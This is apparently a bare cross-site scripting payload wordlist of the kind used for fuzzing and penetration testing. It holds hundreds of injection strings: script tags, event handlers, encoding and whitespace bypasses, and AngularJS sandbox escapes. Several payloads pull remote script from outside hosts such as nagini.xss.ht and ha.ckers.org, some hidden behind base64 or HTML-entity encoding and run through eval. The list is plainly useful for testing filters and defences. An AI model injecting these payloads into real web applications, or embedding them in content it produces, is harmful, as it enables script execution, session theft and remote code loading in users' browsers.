';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode<script>alert('xss')</script>
//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
'';!--"<XSS>=&{()}
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascrscriptipt:alert('XSS')>
<IMG SRC=JaVaScRiPt:alert('XSS')>
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
<IMG SRC=" &#14;  javascript:alert('XSS');">
<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<<SCRIPT>alert("XSS");//<</SCRIPT>
<SCRIPT>a=/XSS/alert(a.source)</SCRIPT>
\";alert('XSS');//
\"-alert('XSS')}//
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
<TABLE><TD BACKGROUND="javascript:alert('XSS')">
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">
<DIV STYLE="width: expression(alert('XSS'));">
<script>alert('XSS')</script>
<img src=x onerror=alert('XSS') />
<svg><script>'XSS'<1>alert('XSS')</script>
"><script>alert('XSS')</script>
'><script>alert('XSS')</script>
><script>alert('XSS')</script>
</script><script>alert('XSS')</script>
< / script >< script >alert('XSS')< / script >
 onfocus=JaVaSCript:alert('XSS') autofocus
" onfocus=JaVaSCript:alert('XSS') autofocus
' onfocus=JaVaSCript:alert('XSS') autofocus
＜script＞alert('XSS')＜/script＞
<sc<script>ript>alert('XSS')</sc</script>ript>
--><script>alert('XSS')</script>
";alert('XSS');t="
';alert('XSS');t='
JavaSCript:alert('XSS')
;alert('XSS');
src=JaVaSCript:prompt(132)
<script>$.getScript("//nagini.xss.ht")</script>
"><script src=https://nagini.xss.ht></script>
javascript:eval('var a=document.createElement(\'script\');a.src=\'https://nagini.xss.ht\';document.body.appendChild(a)')
"><input onfocus=eval(atob(this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vbmFnaW5pLnhzcy5odCI7ZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChhKTs&#61; autofocus>
"><img src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vbmFnaW5pLnhzcy5odCI7ZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChhKTs&#61; onerror=eval(atob(this.id))>
"><video><source onerror=eval(atob(this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vbmFnaW5pLnhzcy5odCI7ZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChhKTs&#61;>
"><iframe srcdoc="&#60;&#115;&#99;&#114;&#105;&#112;&#116;&#62;&#118;&#97;&#114;&#32;&#97;&#61;&#112;&#97;&#114;&#101;&#110;&#116;&#46;&#100;&#111;&#99;&#117;&#109;&#101;&#110;&#116;&#46;&#99;&#114;&#101;&#97;&#116;&#101;&#69;&#108;&#101;&#109;&#101;&#110;&#116;&#40;&#34;&#115;&#99;&#114;&#105;&#112;&#116;&#34;&#41;&#59;&#97;&#46;&#115;&#114;&#99;&#61;&#34;&#104;&#116;&#116;&#112;&#115;&#58;&#47;&#47;nagini.xss.ht&#34;&#59;&#112;&#97;&#114;&#101;&#110;&#116;&#46;&#100;&#111;&#99;&#117;&#109;&#101;&#110;&#116;&#46;&#98;&#111;&#100;&#121;&#46;&#97;&#112;&#112;&#101;&#110;&#100;&#67;&#104;&#105;&#108;&#100;&#40;&#97;&#41;&#59;&#60;&#47;&#115;&#99;&#114;&#105;&#112;&#116;&#62;">
<script>function b(){eval(this.responseText)};a=new XMLHttpRequest();a.addEventListener("load", b);a.open("GET", "//nagini.xss.ht");a.send();</script>
"><script>alert('XSS');</script x="
'><script>alert('XSS');</script x='
><script>alert('XSS');</script x=
{{constructor.constructor('alert('XSS')')()}}
{{[].pop.constructor&#40'alert\u00281\u0029'&#41&#40&#41}}
{{0[a='constructor'][a]('alert('XSS')')()}}
{{$eval.constructor('alert('XSS')')()}}
{{$on.constructor('alert('XSS')')()}}
{{x = {'y':''.constructor.prototype}; x['y'].charAt=[].join;$eval('x=alert('XSS')');}}
{{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert('XSS')//');}}
{{'a'.constructor.prototype.charAt=[].join;$eval('x=alert('XSS')');}}
{{'a'.constructor.prototype.charAt=''.valueOf;$eval("x='\"+(y='if(!window\\u002ex)alert(window\\u002ex=1)')+eval(y)+\"'");}}
{{toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert('XSS')"].sort(toString.constructor);}}
{{(_=''.sub).call.call({}[$='constructor'].getOwnPropertyDescriptor(_.__proto__,$).value,0,'alert('XSS')')()}}
{{'a'[{toString:[].join,length:1,0:'__proto__'}].charAt=''.valueOf;$eval("x='"+(y='if(!window\\u002ex)alert(window\\u002ex=1)')+eval(y)+"'");}}
{{a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert('XSS')')()}}
{{constructor.constructor('alert('XSS')')()}}
{{x=valueOf.name.constructor.fromCharCode;constructor.constructor(x(97,108,101,114,116,40,49,41))()}}
{{x=767015343;y=50986827;a=x.toString(36)+y.toString(36);b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,toString()[a].fromCharCode(112,114,111,109,112,116,40,100,111,99,117,109,101,110,116,46,100,111,109,97,105,110,41))()}}
{{x=767015343;y=50986827;a=x.toString(36)+y.toString(36);b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,toString()[a].fromCodePoint(112,114,111,109,112,116,40,100,111,99,117,109,101,110,116,46,100,111,109,97,105,110,41))()}}
{{x=767015343;y=50986827;a=x.toString(36)+y.toString(36);a.sub.call.call({}[a].getOwnPropertyDescriptor(a.sub.__proto__,a).value,0,toString()[a].fromCharCode(112,114,111,109,112,116,40,100,111,99,117,109,101,110,116,46,100,111,109,97,105,110,41))()}}
{{x=767015343;y=50986827;a=x.toString(36)+y.toString(36);a.sub.call.call({}[a].getOwnPropertyDescriptor(a.sub.__proto__,a).value,0,toString()[a].fromCodePoint(112,114,111,109,112,116,40,100,111,99,117,109,101,110,116,46,100,111,109,97,105,110,41))()}}
{{x=['constr', 'uctor'];a=x.join('');b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'pr\\u{6f}mpt(d\\u{6f}cument.d\\u{6f}main)')()}}
" autofocus onkeyup="javascript:alert('XSS')
' autofocus onkeyup='javascript:alert('XSS')
<script\x20type="text/javascript">javascript:alert('XSS');</script>
<script\x3Etype="text/javascript">javascript:alert('XSS');</script>
<script\x0Dtype="text/javascript">javascript:alert('XSS');</script>
<script\x09type="text/javascript">javascript:alert('XSS');</script>
<script\x0Ctype="text/javascript">javascript:alert('XSS');</script>
<script\x2Ftype="text/javascript">javascript:alert('XSS');</script>
<script\x0Atype="text/javascript">javascript:alert('XSS');</script>
'`"><\x3Cscript>javascript:alert('XSS')</script>
'`"><\x00script>javascript:alert('XSS')</script>
ABC<div style="x\x3Aexpression(javascript:alert('XSS')">DEF
ABC<div style="x:expression\x5C(javascript:alert('XSS')">DEF
ABC<div style="x:expression\x00(javascript:alert('XSS')">DEF
ABC<div style="x:exp\x00ression(javascript:alert('XSS')">DEF
ABC<div style="x:exp\x5Cression(javascript:alert('XSS')">DEF
ABC<div style="x:\x0Aexpression(javascript:alert('XSS')">DEF
ABC<div style="x:\x09expression(javascript:alert('XSS')">DEF
ABC<div style="x:\xE3\x80\x80expression(javascript:alert('XSS')">DEF
ABC<div style="x:\xE2\x80\x84expression(javascript:alert('XSS')">DEF
ABC<div style="x:\xC2\xA0expression(javascript:alert('XSS')">DEF
ABC<div style="x:\xE2\x80\x80expression(javascript:alert('XSS')">DEF
ABC<div style="x:\xE2\x80\x8Aexpression(javascript:alert('XSS')">DEF
ABC<div style="x:\x0Dexpression(javascript:alert('XSS')">DEF
ABC<div style="x:\x0Cexpression(javascript:alert('XSS')">DEF
ABC<div style="x:\xE2\x80\x87expression(javascript:alert('XSS')">DEF
ABC<div style="x:\xEF\xBB\xBFexpression(javascript:alert('XSS')">DEF
ABC<div style="x:\x20expression(javascript:alert('XSS')">DEF
ABC<div style="x:\xE2\x80\x88expression(javascript:alert('XSS')">DEF
ABC<div style="x:\x00expression(javascript:alert('XSS')">DEF
ABC<div style="x:\xE2\x80\x8Bexpression(javascript:alert('XSS')">DEF
ABC<div style="x:\xE2\x80\x86expression(javascript:alert('XSS')">DEF
ABC<div style="x:\xE2\x80\x85expression(javascript:alert('XSS')">DEF
ABC<div style="x:\xE2\x80\x82expression(javascript:alert('XSS')">DEF
ABC<div style="x:\x0Bexpression(javascript:alert('XSS')">DEF
ABC<div style="x:\xE2\x80\x81expression(javascript:alert('XSS')">DEF
ABC<div style="x:\xE2\x80\x83expression(javascript:alert('XSS')">DEF
ABC<div style="x:\xE2\x80\x89expression(javascript:alert('XSS')">DEF
<a href="\x0Bjavascript:javascript:alert('XSS')" id="fuzzelement1">test</a>
<a href="\x0Fjavascript:javascript:alert('XSS')" id="fuzzelement1">test</a>
<a href="\xC2\xA0javascript:javascript:alert('XSS')" id="fuzzelement1">test</a>
<a href="\x05javascript:javascript:alert('XSS')" id="fuzzelement1">test</a>
<a href="\xE1\xA0\x8Ejavascript:javascript:alert('XSS')" id="fuzzelement1">test</a>
<a href="\x18javascript:javascript:alert('XSS')" id="fuzzelement1">test</a>
<a href="\x11javascript:javascript:alert('XSS')" id="fuzzelement1">test</a>
<a href="\xE2\x80\x88javascript:javascript:alert('XSS')" id="fuzzelement1">test</a>
<a href="\xE2\x80\x89javascript:javascript:alert('XSS')" id="fuzzelement1">test</a>
<a href="\xE2\x80\x80javascript:javascript:alert('XSS')" id="fuzzelement1">test</a>
<a href="\x17javascript:javascript:alert('XSS')" id="fuzzelement1">test</a>
<a href="\x03javascript:javascript:alert('XSS')" id="fuzzelement1">test</a>
<a href="\x0Ejavascript:javascript:alert('XSS')" id="fuzzelement1">test</a>
<a href="\x1Ajavascript:javascript:alert('XSS')" id="fuzzelement1">test</a>
<a href="\x00javascript:javascript:alert('XSS')" id="fuzzelement1">test</a>
<a href="\x10javascript:javascript:alert('XSS')" id="fuzzelement1">test</a>
<a href="\xE2\x80\x82javascript:javascript:alert('XSS')" id="fuzzelement1">test</a>
<a href="\x20javascript:javascript:alert('XSS')" id="fuzzelement1">test</a>
<a href="\x13javascript:javascript:alert('XSS')" id="fuzzelement1">test</a>
<a href="\x09javascript:javascript:alert('XSS')" id="fuzzelement1">test</a>
<a href="\xE2\x80\x8Ajavascript:javascript:alert('XSS')" id="fuzzelement1">test</a>
<a href="\x14javascript:javascript:alert('XSS')" id="fuzzelement1">test</a>
<a href="\x19javascript:javascript:alert('XSS')" id="fuzzelement1">test</a>
<a href="\xE2\x80\xAFjavascript:javascript:alert('XSS')" id="fuzzelement1">test</a>
<a href="\x1Fjavascript:javascript:alert('XSS')" id="fuzzelement1">test</a>
<a href="\xE2\x80\x81javascript:javascript:alert('XSS')" id="fuzzelement1">test</a>
<a href="\x1Djavascript:javascript:alert('XSS')" id="fuzzelement1">test</a>
<a href="\xE2\x80\x87javascript:javascript:alert('XSS')" id="fuzzelement1">test</a>
<a href="\x07javascript:javascript:alert('XSS')" id="fuzzelement1">test</a>
<a href="\xE1\x9A\x80javascript:javascript:alert('XSS')" id="fuzzelement1">test</a>
<a href="\xE2\x80\x83javascript:javascript:alert('XSS')" id="fuzzelement1">test</a>
<a href="\x04javascript:javascript:alert('XSS')" id="fuzzelement1">test</a>
<a href="\x01javascript:javascript:alert('XSS')" id="fuzzelement1">test</a>
<a href="\x08javascript:javascript:alert('XSS')" id="fuzzelement1">test</a>
<a href="\xE2\x80\x84javascript:javascript:alert('XSS')" id="fuzzelement1">test</a>
<a href="\xE2\x80\x86javascript:javascript:alert('XSS')" id="fuzzelement1">test</a>
<a href="\xE3\x80\x80javascript:javascript:alert('XSS')" id="fuzzelement1">test</a>
<a href="\x12javascript:javascript:alert('XSS')" id="fuzzelement1">test</a>
<a href="\x0Djavascript:javascript:alert('XSS')" id="fuzzelement1">test</a>
<a href="\x0Ajavascript:javascript:alert('XSS')" id="fuzzelement1">test</a>
<a href="\x0Cjavascript:javascript:alert('XSS')" id="fuzzelement1">test</a>
<a href="\x15javascript:javascript:alert('XSS')" id="fuzzelement1">test</a>
<a href="\xE2\x80\xA8javascript:javascript:alert('XSS')" id="fuzzelement1">test</a>
<a href="\x16javascript:javascript:alert('XSS')" id="fuzzelement1">test</a>
<a href="\x02javascript:javascript:alert('XSS')" id="fuzzelement1">test</a>
<a href="\x1Bjavascript:javascript:alert('XSS')" id="fuzzelement1">test</a>
<a href="\x06javascript:javascript:alert('XSS')" id="fuzzelement1">test</a>
<a href="\xE2\x80\xA9javascript:javascript:alert('XSS')" id="fuzzelement1">test</a>
<a href="\xE2\x80\x85javascript:javascript:alert('XSS')" id="fuzzelement1">test</a>
<a href="\x1Ejavascript:javascript:alert('XSS')" id="fuzzelement1">test</a>
<a href="\xE2\x81\x9Fjavascript:javascript:alert('XSS')" id="fuzzelement1">test</a>
<a href="\x1Cjavascript:javascript:alert('XSS')" id="fuzzelement1">test</a>
<a href="javascript\x00:javascript:alert('XSS')" id="fuzzelement1">test</a>
<a href="javascript\x3A:javascript:alert('XSS')" id="fuzzelement1">test</a>
<a href="javascript\x09:javascript:alert('XSS')" id="fuzzelement1">test</a>
<a href="javascript\x0D:javascript:alert('XSS')" id="fuzzelement1">test</a>
<a href="javascript\x0A:javascript:alert('XSS')" id="fuzzelement1">test</a>
`"'><img src=xxx:x \x0Aonerror=javascript:alert('XSS')>
`"'><img src=xxx:x \x22onerror=javascript:alert('XSS')>
`"'><img src=xxx:x \x0Bonerror=javascript:alert('XSS')>
`"'><img src=xxx:x \x0Donerror=javascript:alert('XSS')>
`"'><img src=xxx:x \x2Fonerror=javascript:alert('XSS')>
`"'><img src=xxx:x \x09onerror=javascript:alert('XSS')>
`"'><img src=xxx:x \x0Conerror=javascript:alert('XSS')>
`"'><img src=xxx:x \x00onerror=javascript:alert('XSS')>
`"'><img src=xxx:x \x27onerror=javascript:alert('XSS')>
`"'><img src=xxx:x \x20onerror=javascript:alert('XSS')>
"`'><script>\x3Bjavascript:alert('XSS')</script>
"`'><script>\x0Djavascript:alert('XSS')</script>
"`'><script>\xEF\xBB\xBFjavascript:alert('XSS')</script>
"`'><script>\xE2\x80\x81javascript:alert('XSS')</script>
"`'><script>\xE2\x80\x84javascript:alert('XSS')</script>
"`'><script>\xE3\x80\x80javascript:alert('XSS')</script>
"`'><script>\x09javascript:alert('XSS')</script>
"`'><script>\xE2\x80\x89javascript:alert('XSS')</script>
"`'><script>\xE2\x80\x85javascript:alert('XSS')</script>
"`'><script>\xE2\x80\x88javascript:alert('XSS')</script>
"`'><script>\x00javascript:alert('XSS')</script>
"`'><script>\xE2\x80\xA8javascript:alert('XSS')</script>
"`'><script>\xE2\x80\x8Ajavascript:alert('XSS')</script>
"`'><script>\xE1\x9A\x80javascript:alert('XSS')</script>
"`'><script>\x0Cjavascript:alert('XSS')</script>
"`'><script>\x2Bjavascript:alert('XSS')</script>
"`'><script>\xF0\x90\x96\x9Ajavascript:alert('XSS')</script>
"`'><script>-javascript:alert('XSS')</script>
"`'><script>\x0Ajavascript:alert('XSS')</script>
"`'><script>\xE2\x80\xAFjavascript:alert('XSS')</script>
"`'><script>\x7Ejavascript:alert('XSS')</script>
"`'><script>\xE2\x80\x87javascript:alert('XSS')</script>
"`'><script>\xE2\x81\x9Fjavascript:alert('XSS')</script>
"`'><script>\xE2\x80\xA9javascript:alert('XSS')</script>
"`'><script>\xC2\x85javascript:alert('XSS')</script>
"`'><script>\xEF\xBF\xAEjavascript:alert('XSS')</script>
"`'><script>\xE2\x80\x83javascript:alert('XSS')</script>
"`'><script>\xE2\x80\x8Bjavascript:alert('XSS')</script>
"`'><script>\xEF\xBF\xBEjavascript:alert('XSS')</script>
"`'><script>\xE2\x80\x80javascript:alert('XSS')</script>
"`'><script>\x21javascript:alert('XSS')</script>
"`'><script>\xE2\x80\x82javascript:alert('XSS')</script>
"`'><script>\xE2\x80\x86javascript:alert('XSS')</script>
"`'><script>\xE1\xA0\x8Ejavascript:alert('XSS')</script>
"`'><script>\x0Bjavascript:alert('XSS')</script>
"`'><script>\x20javascript:alert('XSS')</script>
"`'><script>\xC2\xA0javascript:alert('XSS')</script>
<img \x00src=x onerror="alert('XSS')">
<img \x47src=x onerror="javascript:alert('XSS')">
<img \x11src=x onerror="javascript:alert('XSS')">
<img \x12src=x onerror="javascript:alert('XSS')">
<img\x47src=x onerror="javascript:alert('XSS')">
<img\x10src=x onerror="javascript:alert('XSS')">
<img\x13src=x onerror="javascript:alert('XSS')">
<img\x32src=x onerror="javascript:alert('XSS')">
<img\x47src=x onerror="javascript:alert('XSS')">
<img\x11src=x onerror="javascript:alert('XSS')">
<img \x47src=x onerror="javascript:alert('XSS')">
<img \x34src=x onerror="javascript:alert('XSS')">
<img \x39src=x onerror="javascript:alert('XSS')">
<img \x00src=x onerror="javascript:alert('XSS')">
<img src\x09=x onerror="javascript:alert('XSS')">
<img src\x10=x onerror="javascript:alert('XSS')">
<img src\x13=x onerror="javascript:alert('XSS')">
<img src\x32=x onerror="javascript:alert('XSS')">
<img src\x12=x onerror="javascript:alert('XSS')">
<img src\x11=x onerror="javascript:alert('XSS')">
<img src\x00=x onerror="javascript:alert('XSS')">
<img src\x47=x onerror="javascript:alert('XSS')">
<img src=x\x09onerror="javascript:alert('XSS')">
<img src=x\x10onerror="javascript:alert('XSS')">
<img src=x\x11onerror="javascript:alert('XSS')">
<img src=x\x12onerror="javascript:alert('XSS')">
<img src=x\x13onerror="javascript:alert('XSS')">
<img[a][b][c]src[d]=x[e]onerror=[f]"alert('XSS')">
<img src=x onerror=\x09"javascript:alert('XSS')">
<img src=x onerror=\x10"javascript:alert('XSS')">
<img src=x onerror=\x11"javascript:alert('XSS')">
<img src=x onerror=\x12"javascript:alert('XSS')">
<img src=x onerror=\x32"javascript:alert('XSS')">
<img src=x onerror=\x00"javascript:alert('XSS')">
<img src="x` `<script>javascript:alert('XSS')</script>"` `>
<img src onerror /" '"= alt=javascript:alert('XSS')//">
<title onpropertychange=javascript:alert('XSS')></title><title title=>
<!--[if]><script>javascript:alert('XSS')</script -->
<!--[if<img src=x onerror=javascript:alert('XSS')//]> -->
<script src="/\%(jscript)s"></script>
<script src="\\%(jscript)s"></script>
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG SRC= onmouseover="alert('xxs')">
<IMG onmouseover="alert('xxs')">
<IMG SRC="jav   ascript:alert('XSS');">
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out
<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<<SCRIPT>alert("XSS");//<</SCRIPT>
<SCRIPT SRC=http://ha.ckers.org/xss.js?< B >
<SCRIPT SRC=//ha.ckers.org/.j>
<IMG SRC="javascript:alert('XSS')"
<iframe src=http://ha.ckers.org/scriptlet.html <
\";alert('XSS');//
<u oncopy=alert()> Copy me</u>
<i onwheel=alert('XSS')> Scroll over me </i>
<plaintext>
http://a/%%30%30
</textarea><script>alert('XSS')</script>
alert`1`
alert&lpar;1&rpar;
alert&#x28;1&#x29
alert&#40;1&#41
(alert)(1)
a=alert,a(1)
[1].find(alert)
top["al"+"ert"](1)
top[/al/.source+/ert/.source](1)
al\u0065rt(1)
top['al\145rt'](1)
top['al\x65rt'](1)
top[8680439..toString(30)](1)
navigator.vibrate(500)
eval(URL.slice(-8))>#alert('XSS')
eval(location.hash.slice(1)>#alert('XSS')
innerHTML=location.hash>#<script>alert('XSS')</script>
<svg%0Aonload=%09((pro\u006dpt))()//
<sCriPt x>(((confirm)))``</scRipt x>
<w="/x="y>"/OndbLcLick=`<`[confir\u006d``]>z
<deTAiLs/open/oNtoGGle=confirm()>
<scRiPt y="><">/*<sCRipt* */prompt()</script
<A href="javascript%26colon;confirm()">click
<sVg oNloaD=write()>
<A href=javas%26#99;ript:alert('XSS')>click
<sCrIpt/"<a"/srC=data:=".<a,[8].some(confirm)>
<svG/x=">"/oNloaD=confirm()//
<--`<iMG/srC=` onerror=confirm``> --!>
<SVg </onlOad ="1> (_=prompt,_(1)) "">
<!--><scRipT src=//14.rs>
<sCriPt/src=//14.rs?
<sCRIpt x=">" src=//15.rs></script>
<D3/OnMouSEenTer=[2].find(confirm)>z
<D3"<"/OncLick="1>[confirm``]"<">z
<D3/OnpOinTeReENter=confirm``>click here
<!'/*"/*/'/*/"/*--></Script><Image SrcSet=K */; OnError=confirm`1` //>
<Z oncut=alert()>x
<iFrAMe/src \/\/onload = prompt(1)
<dETAILS%0aopen%0aonToGgle%0a=%0aa=prompt,a() x>